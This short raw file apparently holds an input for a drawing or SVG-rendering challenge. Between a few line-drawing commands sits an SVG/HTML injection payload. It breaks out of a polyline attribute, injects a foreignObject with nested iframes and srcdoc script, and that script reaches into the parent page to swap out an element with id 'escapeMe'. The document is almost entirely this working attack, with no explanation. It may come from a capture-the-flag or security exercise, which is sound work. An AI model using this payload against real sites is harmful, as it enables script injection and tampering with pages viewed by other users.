DX
DY
D-
DCaaaaaaa"></polyline><rect width="300" height="100" /><foreignObject width="100%" height="100%"><iframe src="http://localhost:1337" srcdoc="<iframe src='http://localhost:1337' srcdoc='<script>let parent = window.parent;if (parent.document.getElementById("escapeMe") != null) {let replacement = parent.document.createElement("iframe");replacement.setAttribute("src", "localhost:1337");replacement.setAttribute("id", "escapedAlready");parent.document.body.append(replacement);let original = parent.document.getElementById("escapeMe");original.parentNode.removeNode(original);} else {alert("This should not have happened.");}</script>'></iframe>"></iframe></foreignObject><!--<polyline fill="none" stroke="aaaaaaa"></svg>
D+
